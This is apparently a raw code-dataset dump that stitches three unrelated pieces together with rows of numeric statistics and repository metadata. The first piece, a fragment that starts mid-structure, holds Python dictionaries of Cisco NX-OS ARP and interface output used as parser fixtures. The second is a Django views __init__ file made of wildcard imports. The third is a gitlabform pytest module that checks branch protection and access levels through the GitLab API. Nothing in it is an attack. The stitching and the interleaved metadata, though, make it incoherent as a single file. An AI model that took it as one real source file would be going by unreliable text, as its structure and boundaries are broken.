'age': '00:10:22',
'ip': '10.1.7.253',
'link_layer_address': '0050.56a4.a9fc',
'origin': 'dynamic',
'physical_interface': 'mgmt0'}
}
}
}
}
}
ShowIpArpSummaryVrfAll = {
'incomplete': 0,
'throttled': 0,
'resolved': 12,
'total': 12,
'unknown': 0}
ShowIpArpstatisticsVrfAll = {
'statistics': {
'adjacency': {
'adjacency_adds': 43,
'adjacency_deletes': 12,
'adjacency_timeouts': 12,
'failed_due_to_limits': 0},
'received': {
'anycast_proxy_arp': 0,
'dropped': 28218,
'dropped_server_port': 0,
'drops_details': {
'appeared_on_a_wrong_interface': 0,
'arp_refresh_requests_received_from_clients': 0,
'context_not_created': 0,
'directed_broadcast_source': 0,
'dropping_due_to_tunneling_failures': 0,
'glean_requests_recv_count': 71,
'grat_arp_received_on_proxy': 0,
'incorrect_length': 0,
'invalid_context': 0,
'invalid_destination_ip_address': 0,
'invalid_hardwaretype': 0,
'invalid_layer2_address_length': 0,
'invalid_layer3_address_length': 0,
'invalid_protocol_packet': 0,
'invalid_source_ip_address': 28,
'invalid_source_mac_address': 0,
'l2_packet_on_untrusted_l2_port': 0,
'l2fm_query_failed_for_a_l2address': 0,
'no_mem_to_create_per_intf_structure': 0,
'non_active_fhrp_dest_ip': 0,
'non_local_destination_ip_address': 20421,
'number_of_signals_received_from_l2rib': 0,
'packet_with_vip_on_standby_fhrp': 0,
'received_before_arp_initialization': 0,
'requests_came_for_exising_entries': 15,
'requests_came_on_a_l2_interface': 0,
'source_address_mismatch_with_subnet': 0,
'source_mac_address_is_our_own': 0},
'enhanced_proxy_arp': 0,
'fastpath': 0,
'l2_port_track_proxy_arp': 0,
'l2_replies': 0,
'l2_requests': 0,
'local_proxy_arp': 0,
'proxy_arp': 0,
'replies': 6582,
'requests': 22632,
'snooped': 0,
'total': 0,
'tunneled': 0},
'sent': {
'dropped': 0,
'drops_details': {
'adjacency_couldnt_be_added': 0,
'arp_refresh_skipped_over_core_and_flooded': 0,
'client_enqueue_failed': 0,
'context_not_created': 0,
'dest_not_reachable_for_proxy_arp': 0,
'dest_unreachable_for_enhanced_proxy': 0,
'destnination_is_our_own_ip': 26,
'destnination_on_l2_port_tracked': 0,
'invalid_context': 0,
'invalid_dest_ip': 0,
'invalid_ifindex': 0,
'invalid_local_proxy_arp': 0,
'invalid_proxy_arp': 0,
'invalid_src_ip': 0,
'mbuf_operation_failed': 0,
'null_source_ip': 0,
'null_source_mac': 0,
'unattached_ip': 0,
'vip_is_not_active': 0},
'gratuitous': 58,
'l2_replies': 0,
'l2_requests': 0,
'replies': 998,
'requests': 2102,
'total': 3158,
'tunneled': 0}
}
}
ShowIpInterfaceVrfAll = {
"Ethernet2/11": {
"icmp_port_unreachable": "enabled",
"multicast_groups_address": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-down/link-down/admin-down",
"load_sharing": "none",
"ipv4": {
"counters": {
"multicast_bytes_received": 0,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 0,
"unicast_bytes_sent": 0,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 0,
"multicast_packets_sent": 0,
"unicast_bytes_consumed": 0,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 0,
"multicast_bytes_originated": 0,
"multicast_packets_received": 0,
"multicast_packets_consumed": 0,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 0,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 0,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 0,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 0,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 0,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 0
},
"10.64.4.4/24": {
"ip": "10.64.4.4",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"secondary": False,
"ip_subnet": "10.64.4.0"
},
"unnumbered": {
"interface_ref": "loopback0"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 46,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"wccp_redirect_exclude": "disabled"
},
"loopback0": {
"icmp_port_unreachable": "enabled",
"multicast_groups_address": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-up/link-up/admin-up",
"load_sharing": "none",
"ipv4": {
"counters": {
"multicast_bytes_received": 0,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 0,
"unicast_bytes_sent": 0,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 0,
"multicast_packets_sent": 0,
"unicast_bytes_consumed": 5612014,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 0,
"multicast_bytes_originated": 0,
"multicast_packets_received": 0,
"multicast_packets_consumed": 0,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 92391,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 0,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 0,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 0,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 0,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 0
},
"10.64.4.4/24": {
"route_preference": "0",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"ip_subnet": "10.64.4.0",
"ip": "10.64.4.4",
"secondary": False,
"route_tag": "0"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 180,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"wccp_redirect_exclude": "disabled"
},
"Ethernet2/1": {
"icmp_port_unreachable": "enabled",
"load_sharing": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-up/link-up/admin-up",
"ipv4": {
"counters": {
"multicast_bytes_received": 13421700,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 17167084,
"unicast_bytes_sent": 9499793,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 13421700,
"multicast_packets_sent": 208673,
"unicast_bytes_consumed": 2804558,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 208673,
"multicast_bytes_originated": 17167084,
"multicast_packets_received": 208601,
"multicast_packets_consumed": 417202,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 46150,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 53942,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 2803426,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 46139,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 53942,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 9499793
},
"10.3.4.4/24": {
"route_preference": "0",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"ip_subnet": "10.3.4.0",
"ip": "10.3.4.4",
"secondary": False,
"route_tag": "0"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 36,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"wccp_redirect_exclude": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"multicast_groups": [
"224.0.0.2",
"224.0.0.5",
"224.0.0.6"
]
},
"Ethernet2/10.12": {
"icmp_port_unreachable": "enabled",
"multicast_groups_address": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-down/link-down/admin-down",
"load_sharing": "none",
"ipv4": {
"counters": {
"multicast_bytes_received": 0,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 0,
"unicast_bytes_sent": 0,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 0,
"multicast_packets_sent": 0,
"unicast_bytes_consumed": 0,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 0,
"multicast_bytes_originated": 0,
"multicast_packets_received": 0,
"multicast_packets_consumed": 0,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 0,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 0,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 0,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 0,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 0,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 0
},
"10.66.12.12/24": {
"route_preference": "0",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"ip_subnet": "10.66.12.0",
"ip": "10.66.12.12",
"secondary": False,
"route_tag": "0"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 184,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"wccp_redirect_exclude": "disabled"
},
"Ethernet2/12": {
"icmp_port_unreachable": "enabled",
"multicast_groups_address": "none",
"proxy_arp": "disabled",
"interface_status": "protocol-down/link-down/admin-down",
"load_sharing": "none",
"ipv4": {
"counters": {
"multicast_bytes_received": 0,
"labeled_packets_forwarded": 0,
"multicast_bytes_sent": 0,
"unicast_bytes_sent": 0,
"labeled_packets_received": 0,
"labeled_packets_originated": 0,
"multicast_bytes_consumed": 0,
"multicast_packets_sent": 0,
"unicast_bytes_consumed": 0,
"broadcast_packets_originated": 0,
"multicast_packets_originated": 0,
"multicast_bytes_originated": 0,
"multicast_packets_received": 0,
"multicast_packets_consumed": 0,
"broadcast_packets_forwarded": 0,
"broadcast_bytes_originated": 0,
"labeled_bytes_originated": 0,
"broadcast_bytes_consumed": 0,
"broadcast_packets_sent": 0,
"labeled_packets_consumed": 0,
"unicast_packets_consumed": 0,
"labeled_bytes_forwarded": 0,
"broadcast_packets_consumed": 0,
"unicast_packets_sent": 0,
"broadcast_bytes_received": 0,
"labeled_packets_sent": 0,
"labeled_bytes_consumed": 0,
"unicast_bytes_received": 0,
"multicast_bytes_forwarded": 0,
"multicast_packets_forwarded": 0,
"unicast_packets_forwarded": 0,
"unicast_packets_received": 0,
"broadcast_packets_received": 0,
"broadcast_bytes_sent": 0,
"broadcast_bytes_forwarded": 0,
"labeled_bytes_sent": 0,
"unicast_bytes_forwarded": 0,
"unicast_packets_originated": 0,
"labeled_bytes_received": 0,
"unicast_bytes_originated": 0
},
"10.66.12.12/24": {
"ip": "10.66.12.12",
"prefix_length": "24",
"broadcast_address": "255.255.255.255",
"secondary": False,
"ip_subnet": "10.66.12.0"
},
"unnumbered": {
"interface_ref": "Ethernet2/10.12"
}
},
"icmp_unreachable": "disabled",
"wccp_redirect_inbound": "disabled",
"unicast_reverse_path": "none",
"icmp_redirects": "enabled",
"multicast_routing": "disabled",
"wccp_redirect_outbound": "disabled",
"iod": 47,
"directed_broadcast": "disabled",
"ip_mtu": 1500,
"vrf": "default",
"local_proxy_arp": "disabled",
"ip_forwarding": "disabled",
"int_stat_last_reset": "never",
"wccp_redirect_exclude": "disabled"}
}
Arp_info = {
'interfaces': {
'Ethernet1/1': {
'ipv4': {
'neighbors': {
'10.1.3.5': {
'ip': '10.1.3.5',
'link_layer_address': 'aaaa.bbbb.cccc',
'origin': 'static'}
}
}
},
'Ethernet1/1.1': {
'ipv4': {
'neighbors': {
'192.168.4.2': {
'ip': '192.168.4.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic'}
}
}
},
'Ethernet1/1.2': {
'ipv4': {
'neighbors': {
'192.168.154.2': {
'ip': '192.168.154.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic'}
}
}
},
'Ethernet1/1.4': {
'ipv4': {
'neighbors': {
'192.168.106.2': {
'ip': '192.168.106.2',
'link_layer_address': '000c.292a.1eaf',
'origin': 'dynamic'}
}
}
},
'Ethernet1/2.1': {
'ipv4': {
'neighbors': {
'192.168.154.2': {
'ip': '192.168.154.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic'}
}
}
},
'Ethernet1/2.2': {
'ipv4': {
'neighbors': {
'192.168.51.2': {
'ip': '192.168.51.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic'}
}
}
},
'Ethernet1/2.4': {
'ipv4': {
'neighbors': {
'192.168.9.2': {
'ip': '192.168.9.2',
'link_layer_address': '000c.2904.5840',
'origin': 'dynamic'}
}
}
},
'Ethernet1/4.100': {
'ipv4': {
'neighbors': {
'10.51.1.101': {
'ip': '10.51.1.101',
'link_layer_address': '0000.71c7.6e61',
'origin': 'dynamic'}
}
}
},
'Ethernet1/4.101': {
'ipv4': {
'neighbors': {
'10.154.1.101': {
'ip': '10.154.1.101',
'link_layer_address': '0000.71c7.75c1',
'origin': 'dynamic'}
}
}
},
'Ethernet1/4.200': {
'ipv4': {
'neighbors': {
'10.76.1.101': {
'ip': '10.76.1.101',
'link_layer_address': '0000.0068.ce6f',
'origin': 'dynamic'}
}
}
},
'Ethernet2/1': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'Ethernet2/10.12': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'Ethernet2/11': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'Ethernet2/12': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'loopback0': {
'arp_dynamic_learning': {
'local_proxy_enable': False,
'proxy_enable': False}
},
'mgmt0': {
'ipv4': {
'neighbors': {
'10.1.7.1': {
'ip': '10.1.7.1',
'link_layer_address': '0012.7f57.ac80',
'origin': 'dynamic'},
'10.1.7.250': {
'ip': '10.1.7.250',
'link_layer_address': '0050.5682.7915',
'origin': 'dynamic'},
'10.1.7.253': {
'ip': '10.1.7.253',
'link_layer_address': '0050.56a4.a9fc',
'origin': 'dynamic'}
}
}
}
},
'statistics': {
'entries_total': 12,
'in_drops': 28218,
'in_replies_pkts': 6582,
'in_requests_pkts': 22632,
'in_total': 0,
'incomplete_total': 0,
'out_drops': 0,
'out_gratuitous_pkts': 58,
'out_replies_pkts': 998,
'out_requests_pkts': 2102,
'out_total': 3158}
} | 45.672194 | 75 | 0.36194 | 2,447 | 35,807 | 4.955456 | 0.118512 | 0.031667 | 0.034306 | 0.029688 | 0.806696 | 0.791687 | 0.780059 | 0.764885 | 0.757546 | 0.706004 | 0 | 0.094608 | 0.535957 | 35,807 | 784 | 76 | 45.672194 | 0.635171 | 0.001061 | 0 | 0.661499 | 0 | 0 | 0.354129 | 0.163978 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.007752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
19afebcb2359181c41d4d21d834f4df4d2e3fcbf | 158 | py | Python | exp/views/__init__.py | enrobyn/lookit-api | 621fbb8b25100a21fd94721d39003b5d4f651dc5 | [
"MIT"
] | null | null | null | exp/views/__init__.py | enrobyn/lookit-api | 621fbb8b25100a21fd94721d39003b5d4f651dc5 | [
"MIT"
] | null | null | null | exp/views/__init__.py | enrobyn/lookit-api | 621fbb8b25100a21fd94721d39003b5d4f651dc5 | [
"MIT"
] | null | null | null | from exp.views.user import * # noqa
from exp.views.study import * # noqa
from exp.views.dashboard import * # noqa
from exp.views.video import * # noqa
| 19.75 | 41 | 0.702532 | 24 | 158 | 4.625 | 0.375 | 0.252252 | 0.432432 | 0.459459 | 0.594595 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196203 | 158 | 7 | 42 | 22.571429 | 0.874016 | 0.120253 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
273ae5e299ae3e321d4a60e68b9fc616d964321b | 13,158 | py | Python | gitlabform/gitlabform/test/test_branches.py | KrystianOcado/gitlabform | 94066206542c8457bb28a34b3f83ae0cd015fd6f | [
"MIT"
] | null | null | null | gitlabform/gitlabform/test/test_branches.py | KrystianOcado/gitlabform | 94066206542c8457bb28a34b3f83ae0cd015fd6f | [
"MIT"
] | null | null | null | gitlabform/gitlabform/test/test_branches.py | KrystianOcado/gitlabform | 94066206542c8457bb28a34b3f83ae0cd015fd6f | [
"MIT"
] | null | null | null | import pytest
from gitlabform.gitlabform import GitLabForm
from gitlabform.gitlabform.test import create_group, create_project_in_group, get_gitlab, create_readme_in_project, \
GROUP_NAME
PROJECT_NAME = 'branches_project'
GROUP_AND_PROJECT_NAME = GROUP_NAME + '/' + PROJECT_NAME
@pytest.fixture(scope="module")
def gitlab(request):
gl = get_gitlab()
create_group(GROUP_NAME)
create_project_in_group(GROUP_NAME, PROJECT_NAME)
create_readme_in_project(GROUP_AND_PROJECT_NAME) # in master branch
branches = ['protect_branch_but_allow_all', 'protect_branch_and_disallow_all',
'protect_branch_and_allow_merges', 'protect_branch_and_allow_pushes',
'protect_branch_and_allow_merges_access_levels', 'protect_branch_and_allow_pushes_access_levels',
'protect_branch']
for branch in branches:
gl.create_branch(GROUP_AND_PROJECT_NAME, branch, 'master')
def fin():
# delete all created branches
for branch_to_delete in branches:
gl.delete_branch(GROUP_AND_PROJECT_NAME, branch_to_delete)
request.addfinalizer(fin)
return gl # provide fixture value
protect_branch_but_allow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_but_allow_all:
protected: true
developers_can_push: true
developers_can_merge: true
"""
protect_branch_and_disallow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_disallow_all:
protected: true
developers_can_push: false
developers_can_merge: false
"""
mixed_config = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: true
developers_can_push: false
developers_can_merge: true
protect_branch_and_allow_pushes:
protected: true
developers_can_push: true
developers_can_merge: false
"""
unprotect_branches = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: false
protect_branch_and_allow_pushes:
protected: false
"""
mixed_config_with_access_levels = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges_access_levels:
protected: true
push_access_level: 0
merge_access_level: 30
unprotect_access_level: 40
'*_allow_pushes_access_levels':
protected: true
push_access_level: 30
merge_access_level: 30
unprotect_access_level: 40
"""
mixed_config_with_access_levels_update = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges_access_levels:
protected: true
push_access_level: 0
merge_access_level: 40
unprotect_access_level: 40
'*_allow_pushes_access_levels':
protected: true
push_access_level: 40
merge_access_level: 40
unprotect_access_level: 40
"""
mixed_config_with_access_levels_unprotect_branches = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges_access_levels:
protected: false
'*_allow_pushes_access_levels':
protected: false
"""
config_protect_branch_with_old_api = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: true
developers_can_push: true
developers_can_merge: true
"""
config_protect_branch_with_new_api = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: true
push_access_level: 0
merge_access_level: 40
unprotect_access_level: 40
"""
config_protect_branch_unprotect = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: false
"""
config_unprotect_branch_with_old_api = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: false
developers_can_push: true
developers_can_merge: true
"""
config_unprotect_branch_with_new_api = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch:
protected: false
push_access_level: 0
merge_access_level: 40
unprotect_access_level: 40
"""
class TestBranches:
def test__protect_branch_but_allow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_but_allow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_but_allow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
def test__protect_branch_and_disallow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_and_disallow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_disallow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is False
def test__mixed_config(self, gitlab):
gf = GitLabForm(config_string=mixed_config,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is True
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is False
gf = GitLabForm(config_string=unprotect_branches,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is False
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is False
def test__mixed_config_with_new_api(self, gitlab):
gf = GitLabForm(config_string=mixed_config_with_access_levels,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges_access_levels')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 30
assert branch['unprotect_access_levels'][0]['access_level'] is 40
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, '*_allow_pushes_access_levels')
assert branch['push_access_levels'][0]['access_level'] is 30
assert branch['merge_access_levels'][0]['access_level'] is 30
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=mixed_config_with_access_levels_update,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges_access_levels')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, '*_allow_pushes_access_levels')
assert branch['push_access_levels'][0]['access_level'] is 40
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=mixed_config_with_access_levels_unprotect_branches,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges_access_levels')
assert branch['protected'] is False
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes_access_levels')
assert branch['protected'] is False
def test_protect_branch_with_old_api_next_update_with_new_api_and_unprotect(self, gitlab):
gf = GitLabForm(config_string=config_protect_branch_with_old_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
gf = GitLabForm(config_string=config_protect_branch_with_new_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=config_protect_branch_unprotect,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is False
def test_protect_branch_with_new_api_next_update_with_old_api_and_unprotect(self, gitlab):
gf = GitLabForm(config_string=config_protect_branch_with_new_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=config_protect_branch_with_old_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
gf = GitLabForm(config_string=config_protect_branch_unprotect,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is False
def test_unprotect_when_the_rest_of_the_parameters_are_still_specified_old_api(self, gitlab):
gf = GitLabForm(config_string=config_protect_branch_with_old_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
gf = GitLabForm(config_string=config_unprotect_branch_with_old_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is False
def test_unprotect_when_the_rest_of_the_parameters_are_still_specified_new_api(self, gitlab):
gf = GitLabForm(config_string=config_protect_branch_with_new_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch_access_levels(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['push_access_levels'][0]['access_level'] is 0
assert branch['merge_access_levels'][0]['access_level'] is 40
assert branch['unprotect_access_levels'][0]['access_level'] is 40
gf = GitLabForm(config_string=config_unprotect_branch_with_new_api,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch')
assert branch['protected'] is False
